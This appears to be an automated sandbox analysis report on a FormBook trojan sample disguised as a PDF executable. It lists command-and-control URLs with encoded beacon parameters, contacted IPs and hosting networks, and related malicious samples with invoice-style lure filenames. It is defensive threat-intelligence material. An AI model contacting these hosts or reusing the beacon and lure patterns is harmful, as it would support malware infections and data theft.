http://www.kevin-torkelson.info/gekb/?Z0=5z2j4JvjBCmnxDGlKBgzTD3+HUD/dd2fumCOi9/ZiiqSem4bSPmiTeLNTUQRFOSACWspsHfkjQi2G8tl0kaRWA67inr6j8yvx+6PXqz9iyZ5+RA70tZ4RmMUT5lyJ2S3VdPbvKQVdTVJ&fRr0=tfAptZ | false | Avira URL Cloud: safe | unknown
http://www.mandemj.top/to69/?Z0=jnxbIh9toY3Lk084faTvVBMEFxwUktgIZy5Q1YpSMvmzprTTtz9cwA3B/bTtN1ehZaJt7UsIXSNTUbHOXFDXB9gkhdqEj3u6wGNYEX9l8USgN38burlDvemyCHtOx57idtfraeuBs8os&fRr0=tfAptZ | false | Avira URL Cloud: safe | unknown
http://www.disn-china.buzz/za6x/ | false | Avira URL Cloud: safe | unknown
http://www.kevin-torkelson.info/gekb/ | false | Avira URL Cloud: safe | unknown
http://www.qwefs.org/toq1/ | false | Avira URL Cloud: safe | unknown
http://www.mandemj.top/to69/ | false | Avira URL Cloud: safe | unknown
http://www.disn-china.buzz/za6x/?fRr0=tfAptZ&Z0=EgAkyEJNK52+6mt0ZZzaOaTRCjAqhTrWwvgRo5oIQtO9ZSuXgOHTRb0W4iTGk1GYFMCByhdBFH2COuTwpe8yjCAk5/Of1W40SqKn8hyiq9h4asN2CcaU88uOnsZx5gwZ1TVihW9sV3GM | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | cmdl32.exe, 0000000C.00000002.3161379449.00000000080BA000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff | cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://dts.gnpge.com | EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | cmdl32.exe, 0000000C.00000002.3161379449.00000000080BA000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.kevin-torkelson.info/__media__/js/trademark.php?d=kevin-torkelson.info&type=ns | cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://i3.cdn-image.com/__media__/pics/28903/search.png) | cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.consentmanager.net | cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.Kevin-torkelson.info | cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.kevin-torkelson.info/Anti_Wrinkle_Creams.cfm?fp=6j6oLwulZ3k544A1Hn3uTqUsRR%2FSpdhuuZoiiaa | cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | cmdl32.exe, 0000000C.00000002.3161379449.00000000080BA000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.kevin-torkelson.info/High_Speed_Internet.cfm?fp=6j6oLwulZ3k544A1Hn3uTqUsRR%2FSpdhuuZoiiaa | cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf | cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://i3.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg | cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2 | cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | cmdl32.exe, 0000000C.00000002.3161379449.00000000080BA000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf | cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix | cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.mandemj.top | EyHLOQmzGKBL.exe, 0000000D.00000002.3155322481.00000000007C7000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.kevin-torkelson.info/fashion_trends.cfm?fp=6j6oLwulZ3k544A1Hn3uTqUsRR%2FSpdhuuZoiiaaThZHr | cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.kevin-torkelson.info/Parental_Control.cfm?fp=6j6oLwulZ3k544A1Hn3uTqUsRR%2FSpdhuuZoiiaaThZ | cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.kevin-torkelson.info/__media__/design/underconstructionnotice.php?d=kevin-torkelson.info | cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot | cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://delivery.consentmanager.net | cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold | cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2 | cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://i3.cdn-image.com/__media__/pics/29590/bg1.png) | cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot | cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://jino.ru | cmdl32.exe, 0000000C.00000002.3159746980.00000000057D4000.00000004.10000000.00040000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.0000000002B84000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2081521933.0000000020F04000.00000004.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff | cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | cmdl32.exe, 0000000C.00000002.3161379449.00000000080BA000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://i3.cdn-image.com/__media__/pics/28905/arrrow.png) | cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix | cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.kevin-torkelson.info/All_Inclusive_Vacation_Packages.cfm?fp=6j6oLwulZ3k544A1Hn3uTqUsRR%2F | cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | cmdl32.exe, 0000000C.00000002.3161379449.00000000080BA000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://i3.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg | cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ac.ecosia.org/autocomplete?q= | cmdl32.exe, 0000000C.00000002.3161379449.00000000080BA000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf | cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf | cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp | false
                            • Avira URL Cloud: safe
                            unknown
                            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regularcmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://i3.cdn-image.com/__media__/js/min.js?v2.3cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=cmdl32.exe, 0000000C.00000002.3161379449.00000000080BA000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
IP | Domain | Country | ASN | ASN Name | Malicious
162.0.238.43 | www.mandemj.top | Canada | 22612 | NAMECHEAP-NETUS | false
45.114.171.236 | www.qwefs.org | Hong Kong | 132839 | POWERLINE-AS-APPOWERLINEDATACENTERHK | false
84.32.84.32 | dfmagazine.shop | Lithuania | 33922 | NTT-LT-ASLT | false
208.91.197.27 | www.kevin-torkelson.info | Virgin Islands (BRITISH) | 40034 | CONFLUENCE-NETWORK-INCVG | false
195.161.68.8 | www.trapkitten.website | Russian Federation | 8342 | RTCOMM-ASRU | false
161.97.168.245 | www.disn-china.buzz | United States | 51167 | CONTABODE | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1519456
Start date and time: 2024-09-26 15:22:02 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 40s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Product Data Specifications_PDF.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@8/6
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 92%
• Number of executed functions: 53
• Number of non-executed functions: 297
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may have missing disassembly code information
• Report size exceeded the maximum capacity and may have missing disassembly code
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: Product Data Specifications_PDF.exe
Time | Type | Description
11:19:41 | API Interceptor | 4030031x Sleep call for process: cmdl32.exe modified
Match | Associated Sample Name / URL (Detection, Threat Name) | Context

Match: 162.0.238.43
• PO5118000306 pdf.exe (malicious, FormBook): www.storestone.xyz/pd4o/
• QlHhDu2uh1.exe (malicious, FormBook): www.mandemj.top/to69/?vlJ0J=jnxbIh9toY3Lk084faTvVBMEFxwUktgIZy5Q1YpSMvmzprTTtz9cwA3B/bTtN1ehZaJt7UsIXSNTUbHOXFDXB6xmvPC7jVOY3WNYEUB78n7uOkwblrlFm/iycyJOk57iLJ//IZc=&HDJP=Pnl8G6jPyrn
• BL Draft-Invoice-Packing list-Shipping Document.pif.exe (malicious, FormBook): www.mechecker.life/b6h1/
• 2nd RFQ TECMARKQATAR PO33218_PDF.exe (malicious, FormBook): www.mandemj.top/to69/?mnShvP=jnxbIh9toY3Lk087BKTBUwMLIQNntOIIZy5Q1YpSMvmzprTTtz9cwA3B/bTtN1ehZaJt7UsIXSNTUbHOXFDXTMZnvKu4jSfDtGBlDX578zWDJUwflrx6suU=&Cbj=nB9LWdWpMT7tUBt
• SecuriteInfo.com.Win32.Malware-gen.24953.22588.exe (malicious, FormBook): www.mandemj.top/to69/?VzA=dz5HvTSP4ZdlFHDP&RD4=jnxbIh9toY3Lk087BKTBUwMLIQNntOIIZy5Q1YpSMvmzprTTtz9cwA3B/bTtN1ehZaJt7UsIXSNTUbHOXFDXTMZnvKu4jSfDtGBlDX578zWDJUwflrx6suU=
• x.exe (malicious, FormBook): www.withad.xyz/r0nv/
• bin.exe (malicious, FormBook): www.withad.xyz/r0nv/
• rfOfF6s6gI.exe (malicious, FormBook): www.heolty.xyz/sr8n/
• 4qV0xW2NSj.exe (malicious, FormBook): www.heolty.xyz/sr8n/
• sBX8VM67ZE.exe (malicious, FormBook): www.heolty.life/niik/

Match: 45.114.171.236
• QlHhDu2uh1.exe (malicious, FormBook): www.qwefs.org/toq1/?vlJ0J=uFBHOFjbtFvxqkces1RGqIZYNgmiur5XIDe+8RHTfxNdoahKRW8Ulx3EiPWAiOWTg+KGn77UKm1RYG+ByVGjAxWJvZuyIttP8SZLxWgFhf4T9iqlbzDAEocRCjmQRWcevSsRoi8=&HDJP=Pnl8G6jPyrn
• SecuriteInfo.com.W32.AutoIt.AQ.gen.Eldorado.22170.7541.exe (malicious, FormBook): www.qwefs.org/toq1/?6JAhxhQ=uFBHOFjbtFvxqkces1RGqIZYNgmiur5XIDe+8RHTfxNdoahKRW8Ulx3EiPWAiOWTg+KGn77UKm1RYG+ByVGjBxXPrZeNNfVPxSdlxWEZhsRe9BSDbyrqKKQRMjmYHHpOtg==&In3=AzvpidDp
• 2nd RFQ TECMARKQATAR PO33218_PDF.exe (malicious, FormBook): www.qwefs.org/toq1/?mnShvP=uFBHOFjbtFvxqkcdylRor5ZXABbRnIRXIDe+8RHTfxNdoahKRW8Ulx3EiPWAiOWTg+KGn77UKm1RYG+ByVGjSH+IvcCxIq8UmCV22VYFhLV+6SqhbzX/O5o=&Cbj=nB9LWdWpMT7tUBt
• SecuriteInfo.com.Win32.Malware-gen.24953.22588.exe (malicious, FormBook): www.qwefs.org/toq1/?RD4=uFBHOFjbtFvxqkcdylRor5ZXABbRnIRXIDe+8RHTfxNdoahKRW8Ulx3EiPWAiOWTg+KGn77UKm1RYG+ByVGjSH+IvcCxIq8UmCV22VYFhLV+6SqhbzX/O5o=&VzA=dz5HvTSP4ZdlFHDP
• RFQ-TECMARKQATAR PO33109.xlsx (malicious, FormBook): www.qwefs.org/toq1/?oXfTz=uFBHOFjbtFvxqkcdykh4q5JXJh6ZnoRXIDe+8RHTfxNdoahKRW8U0UCbhdOPwbKTgOK/uYLPOnJNTGOjy1yfZhGBvJuEIq595D1l2WQbreJE8ATQCjT4LKwEBjf/&kxfp9=-6Mh

Match: 84.32.84.32
• PO5118000306 pdf.exe (malicious, FormBook): www.agilizeimob.app/zkp2/
• UMOWA_PD.BAT.exe (malicious, FormBook, GuLoader): www.dfmagazine.shop/7k8f/
• QlHhDu2uh1.exe (malicious, FormBook): www.dfmagazine.shop/wc8m/?vlJ0J=LNw/HBPP4tr5bvxS3kL5kO0L1X3Nhxx3YB7NlE9rWxPCxu7fGi7WEXTbZRsRhvhxvKZ1WqSKGQ11o+IxPCwZhLN2h2DTK9csfh9AcreeAGSJ1TcJEV0fpWOmE9rV6P4iWQH1GQ0=&HDJP=Pnl8G6jPyrn
• PO23100072.exe (malicious, FormBook): www.agilizeimob.app/we8s/
• notificacion_de_credito__PDF__.exe (malicious, FormBook): www.thepeatear.online/929i/
• Purchase Order_ AEPL-2324-1126.exe (malicious, FormBook): www.bodegamayorista.online/8xob/
• PO-001.exe (malicious, FormBook): www.godoggyonbase.online/24uv/
• ES-241-29335_pdf.exe (malicious, FormBook): www.loan-insurance.shop/iqhs/
• PO2024033194.exe (malicious, FormBook): www.pakmartcentral.shop/ml5l/
• RECIEPT.PDF.exe (malicious, FormBook): www.pakmartcentral.shop/vjx2/
Match | Associated Sample Name / URL (Detection, Threat Name) | Context

Match: www.disn-china.buzz
• QlHhDu2uh1.exe (malicious, FormBook): 161.97.168.245
• SecuriteInfo.com.W32.AutoIt.AQ.gen.Eldorado.22170.7541.exe (malicious, FormBook): 161.97.168.245
• 2nd RFQ TECMARKQATAR PO33218_PDF.exe (malicious, FormBook): 161.97.168.245
• SecuriteInfo.com.Win32.Malware-gen.24953.22588.exe (malicious, FormBook): 161.97.168.245
• RFQ-TECMARKQATAR PO33109.xlsx (malicious, FormBook): 161.97.168.245

Match: www.trapkitten.website
• QlHhDu2uh1.exe (malicious, FormBook): 195.161.68.8
• AWB_5771388044 Documenti di spedizione.exe (malicious, FormBook): 195.161.68.8
• SecuriteInfo.com.W32.AutoIt.AQ.gen.Eldorado.22170.7541.exe (malicious, FormBook): 195.161.68.8
• 2nd RFQ TECMARKQATAR PO33218_PDF.exe (malicious, FormBook): 195.161.68.8
• SecuriteInfo.com.Win32.Malware-gen.24953.22588.exe (malicious, FormBook): 195.161.68.8

Match: www.kevin-torkelson.info
• PO For Bulk Order.exe (malicious, FormBook): 208.91.197.27
• QlHhDu2uh1.exe (malicious, FormBook): 208.91.197.27
• SecuriteInfo.com.W32.AutoIt.AQ.gen.Eldorado.22170.7541.exe (malicious, FormBook): 208.91.197.27
• 2nd RFQ TECMARKQATAR PO33218_PDF.exe (malicious, FormBook): 208.91.197.27
• SecuriteInfo.com.Win32.Malware-gen.24953.22588.exe (malicious, FormBook): 208.91.197.27
• New Purchase Order.exe (malicious, FormBook): 208.91.197.27
• RFQ-TECMARKQATAR PO33109.xlsx (malicious, FormBook): 208.91.197.27

Match: www.qwefs.org
• QlHhDu2uh1.exe (malicious, FormBook): 45.114.171.236
• SecuriteInfo.com.W32.AutoIt.AQ.gen.Eldorado.22170.7541.exe (malicious, FormBook): 45.114.171.236
• 2nd RFQ TECMARKQATAR PO33218_PDF.exe (malicious, FormBook): 45.114.171.236
• SecuriteInfo.com.Win32.Malware-gen.24953.22588.exe (malicious, FormBook): 45.114.171.236
• RFQ-TECMARKQATAR PO33109.xlsx (malicious, FormBook): 45.114.171.236

Match: www.mandemj.top
• QlHhDu2uh1.exe (malicious, FormBook): 162.0.238.43
• SecuriteInfo.com.W32.AutoIt.AQ.gen.Eldorado.22170.7541.exe (malicious, FormBook): 162.0.238.43
• 2nd RFQ TECMARKQATAR PO33218_PDF.exe (malicious, FormBook): 162.0.238.43
• SecuriteInfo.com.Win32.Malware-gen.24953.22588.exe (malicious, FormBook): 162.0.238.43
Match | Associated Sample Name / URL (Detection, Threat Name) | Context

Match: NTT-LT-ASLT
• PO5118000306 pdf.exe (malicious, FormBook): 84.32.84.32
• UMOWA_PD.BAT.exe (malicious, FormBook, GuLoader): 84.32.84.32
• QlHhDu2uh1.exe (malicious, FormBook): 84.32.84.32
• PO23100072.exe (malicious, FormBook): 84.32.84.32
• http://zip.lu/?redirect=3k7wI (malicious, Unknown): 84.32.84.79
• https://aliceblue-dolphin-702154.hostingersite.com/juno-server-alerts.com/authen.php/ (malicious, Unknown): 84.32.84.197
• https://bjhms.com/modify/ (malicious, Unknown): 84.32.84.196
• https://hfsuit.com/modify/ (malicious, Unknown): 84.32.84.22
• https://kqmrw.com/modify/ (malicious, Unknown): 84.32.84.153
• https://ppjmz.com/modify/ (malicious, Unknown): 84.32.84.125

Match: POWERLINE-AS-APPOWERLINEDATACENTERHK
• NVOICE FOR THE MONTH OF AUG-24.exe (malicious, FormBook): 156.242.132.82
• rAGROTIS10599242024.exe (malicious, FormBook): 154.215.72.110
• QlHhDu2uh1.exe (malicious, FormBook): 45.114.171.236
• oO3ZmCAeLQ.exe (malicious, FormBook): 154.215.72.110
• FvYlbhvZrZ.rtf (malicious, FormBook): 154.215.72.110
• SecuriteInfo.com.Win32.SuspectCrc.23106.21095.xlsx (malicious, FormBook): 154.215.72.110
• file.exe (malicious, FormBook): 154.215.72.110
• file.exe (malicious, FormBook): 154.215.72.110
• DHL Arrive Notice doc pdf.exe (malicious, FormBook): 160.124.205.227
• Quote 05-302.lnk (malicious, FormBook): 154.215.72.110

Match: CONFLUENCE-NETWORK-INCVG
• PO5118000306 pdf.exe (malicious, FormBook): 208.91.197.27
• PO For Bulk Order.exe (malicious, FormBook): 208.91.197.27
• UMOWA_PD.BAT.exe (malicious, FormBook, GuLoader): 208.91.197.27
• QlHhDu2uh1.exe (malicious, FormBook): 208.91.197.27
• http://17ebook.com (malicious, Unknown): 208.91.196.46
• List of Items0001.doc.exe (malicious, FormBook, GuLoader): 208.91.197.27
• Amended Proforma #U2013 SMWD5043.exe (malicious, FormBook): 208.91.197.27
• AWB_5771388044 Documenti di spedizione.exe (malicious, FormBook): 208.91.197.27
• RECIEPT.PDF.exe (malicious, FormBook): 208.91.197.27
• http://kateandkaylearningacademy.com (malicious, Unknown): 208.91.196.253

Match: NAMECHEAP-NETUS
• NVOICE FOR THE MONTH OF AUG-24.exe (malicious, FormBook): 199.192.21.169
• https://centuriontm.bizarreonly.net (malicious, EvilProxy, HTMLPhisher): 162.0.228.73
• CITA#U00c7#U00c3O.exe (malicious, FormBook): 63.250.47.40
• ADNOC requesting RFQ.exe (malicious, FormBook): 162.0.236.169
